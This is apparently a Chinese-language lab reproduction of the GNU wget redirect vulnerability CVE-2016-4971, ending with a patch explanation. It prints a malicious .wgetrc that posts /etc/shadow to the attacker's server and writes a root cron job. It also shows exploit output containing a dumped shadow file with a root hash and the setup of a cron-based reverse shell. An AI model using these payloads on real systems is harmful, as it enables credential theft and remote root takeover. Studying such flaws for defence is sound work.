wget 重定向漏洞（CVE-2016-4971）

概述

GNU wget 低于1.18版本均存在任意文件上传/可能还会造成远程代码执行CVE-2016-4971。当提供给wget一个恶意的url时，wget（版本低于1.18）会执行url所指向的webserver返回头中的30x跳转，造成wget会保存攻击者提供的任意远程文件。

验证

环境

webserver 10.0.97.225/192.168.1.148

logserver 10.0.97.243/192.168.1.149

步骤

在webserver上起了个nginx，nginx.conf里配置了一个302跳转，另外还起了一个ftp服务，监听21端口，python -m pyftpdlib -p21 -w

logserver上wget版本信息

在机器（logserver）上使用wget发起对webserver的访问，从debug信息可以看到wget在遇到30x返回码的时候是不做任何验证就去请求FTP了。

ftp的log：

结果

webserver上的/root/.bash_profile文件就被下载到了发起wget请求的logserver上了，而wget本来是想请求下载webserver上的safe-file.txt文件的。

利用场景

Cronjob

在webserver上准备好.wgetrc文件

[root@localhost ~]# cat .wgetrc
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell

假设现在有需求在服务器logserver上cron脚本每分钟去拉webserver的log文件

*/1 * * * * root wget -N http://webserver/nginx-access.log > /dev/null 2>&1

通过cron的日志可以看到job被执行了

Jul 13 18:54:02 logserver CROND[4161]: (root) CMD (wget -N http://webserver/safe-file.txt > /dev/null 2>&1)

这个job是root用户执行的，所以去root家目录下查看是否已经有.wgetrc文件了

这里有点鸡肋的是如果该目录下已经存在.wgetrc文件，那么wget下载回来的.wgetrc文件将被重命名，就没法控制目标的下载行为了。

既然上传了.wgetrc文件，接下来可以再深入点，反弹个shell试试：

在webserver上运行exploit-db提供的exp脚本

[root@localhost ~]# python wget_exp.py
Ready? Is your FTP server running?
FTP found open on 192.168.1.148:21. Let's go then

Serving wget exploit on port 80...

从logserver上发起到webserver的请求，此时webserver上监听的端口开始有回显

We have a volunteer requesting /nginx-access.log by POST :)

Received POST from wget, this should be the extracted /etc/shadow file:

---[begin]---
 root:$6$t8Pjy8CmXZGtsjRL$ZG.pnIDxJasLKzHA/lVR0GPlLezD1GbqVa1b3zYndE/j8jJbXbF03X8gc9AOcVkM.ZM2EYI2G7m3jCcY3QS/C.:16524:0:99999:7:::
bin:*:16231:0:99999:7:::
daemon:*:16231:0:99999:7:::
adm:*:16231:0:99999:7:::
lp:*:16231:0:99999:7:::
sync:*:16231:0:99999:7:::
shutdown:*:16231:0:99999:7:::
halt:*:16231:0:99999:7:::
mail:*:16231:0:99999:7:::
operator:*:16231:0:99999:7:::
games:*:16231:0:99999:7:::
ftp:*:16231:0:99999:7:::
nobody:*:16231:0:99999:7:::
dbus:!!:16524::::::
polkitd:!!:16524::::::
avahi:!!:16524::::::
avahi-autoipd:!!:16524::::::
postfix:!!:16524::::::
sshd:!!:16524::::::
tcpdump:!!:16535::::::
tss:!!:16545::::::
user01:!!:16552:0:99999:7:::
user02:!!:16553:0:99999:7:::
nscd:!!:16566::::::
nslcd:!!:16566::::::
ntp:!!:16573::::::
saslauth:!!:16575::::::
mailnull:!!:16575::::::
smmsp:!!:16575::::::
www:!!:16653:0:99999:7:::
mysql:!!:16653::::::
td-agent:!!:16862::::::
systemd-bus-proxy:!!:16874::::::
systemd-network:!!:16874::::::
unbound:!!:16874::::::
ocserv:!!:16874::::::
ossec:!!:16944:0:99999:7:::
redis:!!:16957::::::

---[eof]---

Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
192.168.1.149 - - [13/Jul/2016 21:30:11] "POST /nginx-access.log HTTP/1.1" 200 -

File was served. Check on /root/hacked-via-wget on the victim's host in a minute!

此时，在logserver上已经被写入了cron任务，每分钟执行一次的反弹shell任务

等待一分钟，cronjob执行，反弹shell成功

修复

官方的修复方案为在调用从FTP下载文件的函数时多传了一个原始URL参数，在生成本地文件的文件名时使用了原始的URL所带的文件名，而不是使用跳转后FTP连接中的文件名了。具体修改部分可以从commit上查看到。而我们用户要做的就是升级服务器上GNU wget版本至最新或1.18以上。

总结

我发你一个链接，你敢wget吗？

参考

• https://www.exploit-db.com/exploits/40064/
• http://blog.nsfocus.net/wget-analysis-redirection-vulnerability-technology-protection-scheme/